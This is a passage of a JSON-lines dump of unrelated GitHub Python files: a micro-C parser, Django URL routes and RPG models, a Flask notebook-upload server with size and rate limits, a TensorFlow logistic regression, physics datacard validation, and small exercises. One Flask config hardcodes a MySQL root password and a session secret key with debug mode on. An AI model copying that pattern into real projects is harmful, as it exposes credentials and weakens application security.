None:\n \"\"\"\n Defines initialization mode\n \"\"\"\n if isinstance(variable.value, types_.ARRAY):\n if self.index is not None:\n self._set_array_elem(types_.Controller(variable))\n else:\n self._array_init(types_.Controller(variable))\n\n elif variable.pointer:\n type_, reference = self._pointer_init()\n if variable.__class__ is not type_:\n raise SyntaxError(f'Different types {variable.__class__} and {type_}')\n variable.reference = reference\n\n else:\n variable.value = self.calculate_expression()\n\n def _constructor(self, name: str, pointer: bool, mode: str) -> None:\n \"\"\"\n Prepares collected data\n \"\"\"\n if self.memory.get_by_name(name) is None:\n if mode == _INITIALIZE:\n raise SyntaxError(f'The variable <{name}> has not been declared')\n\n self._step()\n self.variable = self.type_(name, pointer)\n\n if self.token in (COMMA, SEMICOLON, ASSIGNMENT):\n self.memory.append(self.variable)\n\n elif self.token is LSBR:\n array = self._parse_array(name, pointer, mode=mode)\n self.variable.value = array\n self.memory.append(self.variable)\n else:\n if mode == _ANNOUNCEMENT:\n raise SyntaxError(f'Redefinition of <{name}>')\n\n self.variable = self.memory.last_viewed\n self._step()\n\n if self.token not in (ASSIGNMENT, LSBR):\n raise SyntaxError(f'Unacceptable token {self.token}')\n elif self.token is LSBR:\n self.index = self._parse_array(name, pointer, mode=_SETITEM)\n\n def _classifier(self, mode: str) -> None:\n \"\"\"\n Defines a part: *var or var\n \"\"\"\n if mode == _ANNOUNCEMENT:\n self._step()\n\n if self.token is MUL:\n self._step()\n if self.token is VARIABLE:\n self._constructor(name=self.name, pointer=True, mode=mode)\n\n elif self.token is VARIABLE:\n self._constructor(name=self.name, pointer=False, mode=mode)\n\n def _determinator(self, mode: str) -> None:\n \"\"\"\n Determines the next step by set mode\n\n Modes: _ANNOUNCEMENT, _INITIALIZE\n\n In _ANNOUNCEMENT parses lines similar to:\n * type var1, *var2, var3[], ...;\n\n In _INITIALIZE parses lines similar to:\n * type var = ...;\n * type var[] = ...;\n After the assignment operator, control passes to the initializer,\n which parses the expression in accordance with the declaration\n \"\"\"\n if mode == _ANNOUNCEMENT:\n self.type_ = self.token\n\n self._classifier(mode)\n if self.token is ASSIGNMENT:\n self._step()\n self._initializer(self.variable)\n else:\n if mode == _ANNOUNCEMENT:\n while self.token is not SEMICOLON:\n if self.token is COMMA:\n self._step()\n self._classifier(mode)\n else:\n raise SyntaxError('You cannot initialize more than one variable in a declaration line')\n\n def parse(self) -> None:\n self._step()\n while self.token != EOF:\n if self.token in Lexer.TYPES.values():\n self._determinator(mode=_ANNOUNCEMENT)\n else:\n self._determinator(mode=_INITIALIZE)\n\n self._step()\n\n\nif __name__ == '__main__':\n L = Lexer('int a [] = {77 -(91*2)/3, 5}; int *q = &a[1]; a[0] = *q + 2;')\n p = Parser(L)\n p.parse()\n print(p.memory)\n\n L1 = Lexer('int a[] = {77 -(91*2)/3}; int c = 33;')\n p1 = Parser(L1)\n p1.parse()\n print(p1.memory)\n\n L2 = Lexer('int a[4] = {7 - 99*2- (88/3),3, 566.2, 4554-888};')\n p2 = Parser(L2)\n p2.parse()\n print(p2.memory)","repo_name":"kenplix/micro-C-parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":11112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"25840597597","text":"\"\"\"StudentEnrollment URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom base.views import(\n\n dashboard,\n req2,\n req3,\n req4,\n req5,\n req6,\n req7,\n registerPage,\n loginPage,\n logoutUser,\n)\n\nurlpatterns = [\n path('register/', registerPage, name=\"register\"),\n path('login/', loginPage, name=\"login\"),\n path('logout/', logoutUser, name=\"logout\"),\n\n path('admin/', admin.site.urls),\n path('', dashboard, name='home'),\n path('req2/', req2, name='req2'),\n path('req3/', req3, name='req3'),\n path('req4/', req4, name='req4'),\n path('req5/', req5, name='req5'),\n path('req6/', req6, name='req6'),\n path('req7/', req7, name='req7'),\n #path('input/', inputPage, name='input'),\n # path('input/', simple_upload, name='upload')\n]\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n \n","repo_name":"Rayhan-Farhan/student-enrollment-analysis","sub_path":"StudentEnrollment/StudentEnrollment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"30277236119","text":"import os\n\n\nclass DefaultConfig(object):\n\n BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))\n\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n # session 使用\n SECRET_KEY = '\\xf9\\xfb\\xdfIb\\xb4\\x0f\\xab\\xf1\\xc9P\\x97\\xc5\\xd4X\"\\x8ag\\xa8\\xd0\\xe8|8\\xcc'\n DEBUG = True\n # 注册mysql\n SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:rock1204@localhost/mono'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"colorfulComeMonochrome/myproject","sub_path":"mono/mono/config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"7540796683","text":"\"\"\"\nFaça um Programa que leia 4 notas, mostre as notas e a média na tela.\n\"\"\"\nnotas = []\nfor i in range(4):\n notas.append(float(input('Digite uma nota: ')))\n\nmedia = sum(notas) / len(notas)\nfor i in notas:\n print(f'Notas: {i}')\nprint(f'Média: {media:.2f}')","repo_name":"VictorM20/ListaDeExercicios","sub_path":"ExerciciosListas/Exercicio3.py","file_name":"Exercicio3.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26472597132","text":"#!/usr/bin/python3\n\nimport os, sys, glob, ROOT, logging, subprocess\nfrom HiggsAnalysis.CombinedLimit.DatacardParser import *\n\nws = os.environ['WS']\nwd = ws+'/validation'\nwdir = wd+'/cards/combine/pyhf2combine'\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=ws+'/logs/validateCombine.log',\n filemode='w')\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger().addHandler(console)\n\nlogging.info('Start validation process for combine card conversion')\ncomblog = logging.getLogger('convert.combine.validate')\n\ndef compareCards(lh, rh):\n if isinstance(lh, list):\n lh.sort()\n rh.sort()\n return True if lh == rh else False\n elif isinstance(lh, dict):\n shared = {k: lh[k] for k in lh if k in rh and lh[k] == rh[k]}\n return True if len(shared) == len(lh.items()) else False\n elif isinstance(lh, set):\n diff = lh.difference(rh)\n return not bool(diff)\n return False\n\ndef compareShapes(lh, rh):\n hists = []\n for hname in lh.keys():\n if rh[hname].Integral() > 0 and abs(lh[hname].Integral()-rh[hname].Integral())/rh[hname].Integral() > 1E-4:\n print(hname, lh[hname].Integral(), rh[hname].Integral())\n hists.append(hname)\n else:\n for b in range(1, lh[hname].GetXaxis().GetNbins()+1):\n if rh[hname].GetBinContent(b) > 1E-10 and abs(lh[hname].GetBinContent(b)-rh[hname].GetBinContent(b))/rh[hname].GetBinContent(b) > 1E-4:\n hists.append(hname)\n break\n return hists\n\nopts = type(\"opts\", (object,), dict(bin=True, noJMax=False, stat=False, nuisancesToExclude=[], allowNoSignal=True, allowNoBackground=True))\n\nruns = glob.glob(wdir+'/*/')\nfor r in runs:\n runName = r.split('/')[-2]\n fcv = glob.glob(wdir+'/'+runName+'/*.txt')\n comblog.info('Validate '+runName+' (combine)')\n\n for f in fcv:\n forig = f.replace('validation/', '').replace('pyhf2combine/', '')\n with open(f, 'r') as fdv:\n dcv = parseCard(fdv, opts)\n with open(forig, 'r') as fdo:\n dco = parseCard(fdo, opts)\n comblog.info('--> Compare datacards: '+os.path.splitext(forig.split('/')[-1])[0])\n res = {}\n res['bins'] = [compareCards(dco.bins, dcv.bins), dco.bins, dcv.bins]\n res['obs'] = [compareCards(dco.obs, dcv.obs), dco.obs, dcv.obs]\n res['processes'] = [compareCards(dco.processes, dcv.processes), dco.processes, dcv.processes]\n res['signals'] = [compareCards(dco.signals, dcv.signals), dco.signals, dcv.signals]\n res['isSignal'] = [compareCards(dco.isSignal, dcv.isSignal), dco.isSignal, dcv.isSignal]\n res['keyline'] = [compareCards(dco.keyline, dcv.keyline), dco.keyline, dcv.keyline]\n res['exp'] = [compareCards(dco.exp, dcv.exp), dco.exp, dcv.exp]\n res['systs'] = [compareCards(dco.systs, dcv.systs), dco.systs, dcv.systs]\n# res['shapeMap'] = [compareCards(dco.shapeMap, dcv.shapeMap), dco.shapeMap, dcv.shapeMap] # run an explicit comparison of shapes below\n res['flatParamNuisances'] = [compareCards(dco.flatParamNuisances, dcv.flatParamNuisances), dco.flatParamNuisances, dcv.flatParamNuisances]\n res['rateParams'] = [compareCards(dco.rateParams, dcv.rateParams), dco.rateParams, dcv.rateParams]\n res['extArgs'] = [compareCards(dco.extArgs, dcv.extArgs), dco.extArgs, dcv.extArgs]\n res['rateParamsOrder'] = [compareCards(dco.rateParamsOrder, dcv.rateParamsOrder), dco.rateParamsOrder, dcv.rateParamsOrder]\n res['frozenNuisances'] = [compareCards(dco.frozenNuisances, dcv.frozenNuisances), dco.frozenNuisances, dcv.frozenNuisances]\n \n passedCard = True\n for k in res.keys():\n if not res[k][0]:\n comblog.error('Datacard comparison failed for '+k+':')\n print('Original:', res[k][1])\n print('Converted:', res[k][2])\n passedCard = False\n \n if passedCard:\n comblog.info('--> Compare datacards: \\033[1;32mpassed\\x1b[0m')\n comblog.info('--> Compare shapes: '+os.path.splitext(forig.split('/')[-1])[0])\n histso, histsv = {}, {}\n for b in dco.shapeMap.keys():\n for p in dco.shapeMap[b].keys():\n rfileo = dco.shapeMap[b][p][0]\n rfilev = dcv.shapeMap[b][p][0]\n rfo = ROOT.TFile(wdir.replace('validation/', '').replace('pyhf2combine', '')+'/'+runName+'/'+rfileo, 'READ')\n rfv = ROOT.TFile(rfilev, 'READ')\n nomo = dco.shapeMap[b][p][1]\n nomv = dcv.shapeMap[b][p][1]\n syso = dco.shapeMap[b][p][2]\n sysv = dcv.shapeMap[b][p][2]\n systNames = [s[0] for s in dco.systs]\n for proc in dco.processes:\n for syst in ['']+systNames:\n if syst == '':\n nomName = nomo.replace('$PROCESS', proc)\n if not rfo.GetListOfKeys().Contains(nomName): continue\n histso[b+'_'+proc] = rfo.Get(nomName).Clone(b+'_'+proc+'_original')\n histso[b+'_'+proc].SetDirectory(0)\n nomName = nomv.replace('$PROCESS', proc)\n if not rfv.Get(nomName):\n comblog.error('Missing histogram in the converted file: '+nomName)\n continue\n histsv[b+'_'+proc] = rfv.Get(nomName).Clone(b+'_'+proc+'_converted')\n histsv[b+'_'+proc].SetDirectory(0)\n else:\n for var in ['Up', 'Down']:\n systName = syso.replace('$PROCESS', proc).replace('$SYSTEMATIC', syst+var)\n if not rfo.GetListOfKeys().Contains(systName): continue\n histso[b+'_'+proc+'_'+syst+var] = rfo.Get(systName).Clone(systName+'_original')\n histso[b+'_'+proc+'_'+syst+var].SetDirectory(0)\n systName = sysv.replace('$PROCESS', proc).replace('$SYSTEMATIC', syst+var)\n if not rfv.Get(systName):\n comblog.error('Missing histogram in the converted file: '+systName)\n continue\n histsv[b+'_'+proc+'_'+syst+var] = rfv.Get(systName).Clone(systName+'_converted')\n histsv[b+'_'+proc+'_'+syst+var].SetDirectory(0)\n\n hists = compareShapes(histso, histsv)\n \n if not hists:\n comblog.info('--> Compare shapes: \\033[1;32mpassed\\x1b[0m')\n else:\n comblog.info('--> Compare shapes: \\033[1;31mfailed\\x1b[0m')\n for h in hists:\n nbins = histso[h].GetXaxis().GetNbins()\n comblog.error('--> Original shape ('+h+'):')\n for b in range(1, nbins+1):\n comblog.error('bin #'+str(b)+': '+str(histso[h].GetBinContent(b))+'+-'+str(histso[h].GetBinError(b)))\n comblog.error('--> Converted shape ('+h+'):')\n for b in range(1, nbins+1):\n comblog.error('bin #'+str(b)+': '+str(histsv[h].GetBinContent(b))+'+-'+str(histsv[h].GetBinError(b)))","repo_name":"kskovpen/combine2pyhf","sub_path":"converter/validateCombine.py","file_name":"validateCombine.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"27386476124","text":"items = input().split()\ninventory = {items[i]: int(items[i + 1]) for i in range(0, len(items), 2)}\n\nitems_to_search = input().split()\n\nfor item in items_to_search:\n if item in inventory:\n print(f\"We have {inventory.get(item)} of {item} left\")\n else:\n print(f\"Sorry, we don't have {item}\")\n","repo_name":"SashkoIT/SoftUni-Software-Engineering","sub_path":"SoftUni Homework/Programming Fundamentals with Python/09. Dictionaries/02. Stock.py","file_name":"02. Stock.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"22609280912","text":"import sys\nimport os.path\nimport imp\n\n\nfrozen = getattr(sys, 'frozen', None)\nour_path = os.path.realpath(os.path.split(__file__)[0])\n\n\ndef exists(module_name):\n '''\n Return whether a module by the name `module_name` exists.\n \n This seems to be the best way to carefully import a module.\n \n Currently implemented for top-level packages only. (i.e. no dots.)\n \n Doesn't support modules imported from a zip file.\n '''\n assert '.' not in module_name\n try:\n imp.find_module(module_name)\n except ImportError:\n return False\n else:\n return True\n\n\ndef prepare_zip_testing(package_names):\n '''Zip all GarlicSim modules and import them for testing.'''\n \n sys.stdout.write('Preparing to zip GarlicSim packages, and then run tests '\n 'with GarlicSim imported from zip files.\\n')\n \n assert not frozen\n\n command_for_making_zip = '\"%s\" \"%s\"' % (\n sys.executable,\n os.path.realpath(os.path.join(our_path, 'make_zip.py')),\n )\n \n if os.name == 'nt': # Conforming to weird Windows standards:\n command_for_making_zip = '\"%s\"' % command_for_making_zip\n \n result = os.system(command_for_making_zip)\n \n if result != 0:\n exit(result)\n \n for package_name in package_names:\n assert not exists(package_name)\n assert package_name not in sys.modules\n\n sys.stdout.write('Importing all GarlicSim packages from zip files... ')\n \n for i, package_name in enumerate(package_names):\n zip_file = os.path.realpath(\n os.path.join(our_path, 'build', (str(i) + '.zip'))\n )\n assert zip_file not in sys.path\n sys.path.append(zip_file)\n package = __import__(package_name)\n assert '.zip' in package.__file__\n \n sys.stdout.write('Done.\\n')\n \n \ndef ensure_zip_testing_was_legit(package_names):\n '''\n Ensure GarlicSim packages were indeed used from zip.\n \n This is used only in `--from-zip` testing, to ensure that the GarlicSim\n packages weren't used from the source folders accidentally.\n '''\n sys.stdout.write('Confirming all GarlicSim packages were used from zip '\n 'files... ')\n for i, package_name in enumerate(package_names):\n assert package_name in sys.modules\n package = sys.modules[package_name]\n assert '.zip' in package.__file__\n \n raw_module_names = \\\n [module_name for module_name in sys.modules.keys() if\n module_name.split('.')[0] == package_name]\n \n # Filtering out module names that map to `None`, because of a bug,\n # probably in `zipimport`, which litters `sys.modules` with\n # non-sense modules:\n \n module_names = [module_name for module_name in raw_module_names if\n sys.modules[module_name] is not None]\n \n module_paths = [sys.modules[module_name].__file__ for\n module_name in module_names]\n \n zip_file_name = str(i) + '.zip'\n snippet_from_real_folder_path = \\\n os.path.sep.join((package_name, package_name))\n for module_path in module_paths:\n assert zip_file_name in module_path\n assert snippet_from_real_folder_path not in module_path\n sys.stdout.write('Done.\\n')","repo_name":"cool-RR/GarlicSim","sub_path":"misc/testing/zip/testing_utilities.py","file_name":"testing_utilities.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"20"} +{"seq_id":"9141112742","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 4 10:17:49 2017\n\n@author: Ruby Kumar\nEXCERCISE: for statements\n\"\"\"\n# Measure some strings\nwords = ['cat', 'monkey', 'human', 'bananas']\nfor word in words:\n print(word, len(word))\n# loop over a slice copy of the entire list (slice any word\n#from the list and put it where you like inside the list; insert()\n\nfor word in words[:]:\n if len(word) > 6:\n words.insert(0, word)\n print(words)\n ","repo_name":"rubykumar1/python-creations","sub_path":"for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"18411971612","text":"# import requests\n# res = requests.get(\"http://www.naver.com\")\n# print(\"응답코드 :\", res.status_code) # 200이면 정상 접근, 304이면 접근 권한이 없음\n\nimport requests # requests 라이브러리 설치 필요\n\nr = requests.get('http://openapi.seoul.go.kr:8088/6d4d776b466c656533356a4b4b5872/json/RealtimeCityAir/1/99')\nrjson = r.json()\n\n# print(rjson['RealtimeCityAir']['row'][0]['MSRSTE_NM'])\n\ngus =rjson['RealtimeCityAir']['row']\n\nfor gu in gus :\n gu_name = gu['MSRSTE_NM']\n gu_mise = gu['IDEX_MVL']\n if gu_mise < 100: #100보다 작은거\n print(gu_name,gu_mise)","repo_name":"gojong/spartacoding","sub_path":"week03/3-7.py","file_name":"3-7.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34242347409","text":"from django.db import models\nfrom place import Place\nimport extsea\nimport rpgdb\n\nclass Character(models.Model):\n\t'''Character class for django'''\n\tname = models.CharField(max_length=50, primary_key=True)\n\tpassword = models.CharField(max_length=100)\n\tplace = models.ForeignKey(Place)\n\tavailable = models.DateTimeField()\n\tclass Meta:\n\t\tapp_label = 'kovin'\n\tdef __unicode__(self):\n\t\treturn self.name\n\tdef to_extsea(self):\n\t\t'''Convert django model into character from extsea module'''\n\t\tcharacter = extsea.Character(self.name)\n\t\tfor attribute in Attribute.objects.filter(owner = self, disabled = False):\n\t\t\tcharacter.add(attribute.to_extsea())\n\t\tcharacter.fight = rpgdb.ai_custom\n\t\treturn character\n\t@staticmethod\n\tdef from_extsea(character):\n\t\t'''Create django model from extsea character'''\n\t\tresult = Character.objects.filter(name=character.name)\n\t\tif len(result) > 0:\n\t\t\tcharacter_model = result[0]\n\t\telse:\n\t\t\tcharacter_model = Character()\n\t\t\tcharacter_model.name = character.name\n\t\tfor i in character.attrib:\n\t\t\tattribute = Attribute.from_extsea(character.attrib[i])\n\t\t\tattribute.owner_id = character_model\n\t\t\tattribute.save()\n\t\treturn character_model\n\n\nclass Attribute(models.Model):\n\t'''Single attribute'''\n\tname = models.CharField(max_length=50)\n\towner = models.ForeignKey(Character)\n\tlevel = models.IntegerField()\n\texp = models.DecimalField(max_digits=10, decimal_places=2)\n\tdisabled = models.BooleanField()\n\tclass Meta:\n\t\tapp_label = 'kovin'\n\tdef __unicode__(self):\n\t\treturn self.name + '@' + self.owner.name\n\tdef to_extsea(self):\n\t\t'''Convert into extsea class'''\n\t\tattribute = rpgdb.createl(self.name, self.level)\n\t\tattribute.id = self.id\n\t\tattribute.rlevel = attribute.level\n\t\tattribute.exp = self.exp\n\t\treturn attribute\n\t@staticmethod\n\tdef from_extsea(attribute):\n\t\t'''Create new model from extsea object'''\n\t\tif hasattr(attribute, 'id'):\n\t\t\tattribute_model = Attribute.objects.get(id=attribute.id)\n\t\telse:\n\t\t\tattribute_model = Attribute()\n\t\tattribute_model.name = attribute.name\n\t\tattribute_model.level = attribute.rlevel\n\t\tattribute_model.exp = str(attribute.exp)\n\t\treturn attribute_model\n","repo_name":"szatkus/kovin","sub_path":"models/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"15473988581","text":"from flask import Flask, request, jsonify\nimport hashlib, tempfile, time, os, shutil, glob, collections\n\napp = Flask(__name__)\n# Set the maximum content length to 4MB\napp.config['MAX_CONTENT_LENGTH'] = 4 * 1024 * 1024\n# Set the disk space miniumum to 256MB\napp.config['MIN_DISK_SPACE'] = 256 * 1024 * 1024\n\n# Specify the directory where uploaded files will be saved\napp.config['UPLOAD_FOLDER'] = os.path.join(os.getcwd(), 'uploads')\n\n# Throttling rate limit\napp.config['UPLOAD_LIMIT'] = 64 * 1024 * 1024 # MB per day\n\n\n# Implements OpenAPI 3.0.3 /upload/ipynb endpoint\n@app.route('/upload/ipynb', methods=['POST'])\ndef upload_ipynb():\n content_length = request.content_length\n if content_length is None or content_length > app.config['MAX_CONTENT_LENGTH']:\n return jsonify({'status': 'error', 'message': 'File size exceeds maximum allowed'}), 413\n \n # Get client IP address from X-Forwarded-For header\n if request.headers.getlist(\"X-Forwarded-For\"):\n client_ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n client_ip = request.remote_addr\n \n # Create a temporary file to save the uploaded chunks\n temp_file = tempfile.NamedTemporaryFile(delete=True)\n\n # Check if the temporary file was created successfully and return an error if not\n if temp_file is None:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n \n # Check if there is enough disk space to save the file\n if shutil.disk_usage(app.config['UPLOAD_FOLDER']).free < app.config['MIN_DISK_SPACE']:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n if shutil.disk_usage(temp_file.name).free < app.config['MIN_DISK_SPACE']:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n # Define a path UPLOAD_FOLDER/IP/today's date, if doesn't exists, create it\n # If exists, check disk usage for that folder if it is larger than UPLOAD_LIMIT, return error\n new_folder_path = os.path.join(app.config['UPLOAD_FOLDER'], f'{client_ip}', f'{time.strftime(\"%Y-%m-%d\")}')\n if not os.path.exists(new_folder_path):\n os.makedirs(new_folder_path, exist_ok=True)\n else:\n if shutil.disk_usage(new_folder_path).used > app.config['UPLOAD_LIMIT']:\n return jsonify({'status': 'error', 'message': 'Too many requests, please try again later'}), 429 \n\n # Process file upload in chunks\n chunk_size = 4096\n file_hash = hashlib.md5()\n while True:\n chunk = request.stream.read(chunk_size)\n if not chunk:\n break\n\n # Check of temporary file size exceeds maximum allowed\n if temp_file.tell() + len(chunk) > app.config['MAX_CONTENT_LENGTH']:\n return jsonify({'status': 'error', 'message': 'File size exceeds maximum allowed'}), 413\n\n # Calculate file hash in chunks and write to temporary file\n file_hash.update(chunk)\n temp_file.write(chunk)\n\n # Check if there is enough disk space to save the file\n if shutil.disk_usage(app.config['UPLOAD_FOLDER']).free < app.config['MIN_DISK_SPACE']:\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n # Flush temporary file to disk\n temp_file.flush()\n\n # Resolve file path and name\n file_hash = file_hash.hexdigest()\n new_file_path = os.path.join(new_folder_path, f'{file_hash}')\n\n # check if the duplicate data that starts with the same same hash already exists\n if glob.glob(f'{new_file_path}*'):\n return jsonify({'status': 'error', 'message': 'Failed to process the request'}), 500\n\n # Copy temporary file into permanent storage, include file hash and timestamp\n new_file_name = f'{new_file_path}.{client_ip}.{int(time.time())}.ipynb'\n shutil.copy(temp_file.name, new_file_name)\n\n # Close temporary file which will delete it\n temp_file.close()\n\n # File upload complete, return success response\n response = {'status': 'success', 'message': 'File uploaded successfully'}\n return jsonify(response)\n\n\n# Test code to upload a file\nif __name__ == '__main__':\n app.run(host = '127.0.0.1')","repo_name":"mcaledonensis/magickey","sub_path":"api/server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23398623670","text":"'''\n结合tensorflow实现Logistic回归算法,测试用例是手写体图片\n'''\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"../data/MNIST_data/\", one_hot=True)\n\ndef Logistic_Regression(lr = 0.01, training_epochs = 50, batch_size = 100, input_shape=784, output_shape=10):\n # 输入和输入标签的变量设置\n x = tf.placeholder(tf.float32, [None, input_shape])\n y = tf.placeholder(tf.float32, [None, 10])\n # 权值矩阵和偏置值的变量设置\n W = tf.Variable(tf.zeros([input_shape, output_shape]))\n b = tf.Variable(tf.zeros([output_shape]))\n\n # 预测函数是softmax函数,其实就是logistic二分类器的多分类形式\n pred = tf.nn.softmax(tf.matmul(x, W) + b)\n # 损失函数是使用交叉熵函数\n cost = tf.reduce_mean(-tf.reduce_sum(y*tf.log(pred), reduction_indices=1))\n # 优化迭代器使用的是梯度下降,注意格式\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=lr).minimize(cost)\n # 初始化所有变量\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(training_epochs):\n avg_cost = 0\n # 总共的批次数\n total_batch = int(mnist.train.num_examples/batch_size)\n #\n for i in range(total_batch):\n # 提取每个批次的训练数据\n batch_xs, batch_yx = mnist.train.next_batch(batch_size)\n # 开始模型的奔跑\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_xs, y: batch_yx})\n # 计算平均损失\n avg_cost += c/total_batch\n\n if (epoch + 1) % 1 == 0:\n # 每1轮都输出cost值\n print(\"Epoch:\", '%04d' % (epoch + 1), \"cost=\", \"{:.9f}\".format(avg_cost))\n print(\"Optimization Finished!\")\n\n # 开始检验模型\n correction_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n # 模型的检验准确率\n accuracy = tf.reduce_mean(tf.cast(correction_prediction, tf.float32))\n print(\"Accuracy:\", accuracy.eval({x: mnist.test.images[:3000], y: mnist.test.labels[:3000]}))\n\nif __name__ == \"__main__\":\n Logistic_Regression(lr=0.01, training_epochs=50, batch_size=100, input_shape=784, output_shape=10)\n\n\n","repo_name":"FLYYZJ/machine_learning_algorithms","sub_path":"Logistic_Regression/Logistic_Regression_TF.py","file_name":"Logistic_Regression_TF.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"20"} +{"seq_id":"86636909735","text":"from collections import defaultdict\n\n\ndef solution(survey, choices):\n score = defaultdict(int)\n indices = [\"RT\", \"CF\", \"JM\", \"AN\"]\n answer = \"\"\n\n # 각 항목의 점수를 계산\n for s, c in zip(survey, choices):\n a, b = s[0], s[1]\n score[a] += max(4 - c, 0)\n score[b] += max(c - 4, 0)\n\n # 지표별 유형 판별\n for index in indices:\n a, b = index[0], index[1]\n if score[a] >= score[b]:\n answer += a\n else:\n answer += b\n return answer\n\n\n\nif __name__ == \"__main__\":\n s = [\"AN\", \"CF\", \"MJ\", \"RT\", \"NA\"]\n c = [5, 3, 2, 7, 5]\n print(solution(s, c))\n","repo_name":"SeoHyeonMyeong/Coding-test-study-kakao","sub_path":"test/성격_유형_검사하기.py","file_name":"성격_유형_검사하기.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"36047886168","text":"\"\"\"\nloading utils for SAM busniess\n\"\"\"\nimport os\nimport glob\nimport random\nrandom.seed(42)\n\nfrom my_SAM.config import image_exts\n\n\"\"\"\nloading yolo text files\n\"\"\"\n\n\ndef get_class_id_bbox_seg_from_yolo(txt_path):\n \"\"\"\n gets each line as a seperate bbox\n :param txt_file: the text file corresponding to the image\n :return: class_id and bbox or class_id, boox, seg\n \"\"\"\n lines = read_txt_file(txt_path)\n yolo_bboxes, class_ids, segs = convert_text_lines_to_yolo_format(lines)\n\n return class_ids, yolo_bboxes, segs\n\n\ndef read_txt_file(txt_path):\n txt_file = open(txt_path, \"r\")\n lines = txt_file.read().splitlines()\n return lines\n\n\ndef convert_text_lines_to_yolo_format(lines):\n bboxes = []\n class_ns = []\n segs = []\n for idx, line in enumerate(lines):\n value = line.split()\n cls = int(value[0])\n x = float(value[1])\n y = float(value[2])\n w = float(value[3])\n h = float(value[4])\n #if we have segmentation data append it\n if len(line) > 5:\n segs.append([float(i) for i in value[5:]])\n\n bboxes.append([x,y,w,h])\n class_ns.append(cls)\n\n return bboxes, class_ns, segs\n\n\ndef get_random_image_ann_path_from_image_paths(image_paths, ann_folder):\n image_path = random.choice(image_paths)\n ann_path = os.path.join(ann_folder, os.path.splitext(os.path.basename(image_path))[0] + '.txt')\n return image_path, ann_path\n\n\n\"\"\"\n###\n###\n\"\"\"\n\ndef get_annotation_path(image_path, ann_dir):\n \"\"\"\n Given an image path and an annotation directory, return the annotation file path\n with the same name as the image file but with a .txt extension.\n\n Args:\n image_path (str): The path to the image file.\n ann_dir (str): The directory where the annotation file should be saved.\n\n Returns:\n The annotation file path as a string.\n \"\"\"\n basename = os.path.basename(image_path)\n annotation_name = os.path.splitext(basename)[0] + '.txt'\n annotation_path = os.path.join(ann_dir, annotation_name)\n assert os.path.exists(annotation_path), f'PATH: {annotation_path} \\nDOES NOT EXIST'\n\n return annotation_path\n\n\ndef glob_image_files(image_folder, exts=image_exts):\n image_paths = []\n for ext in 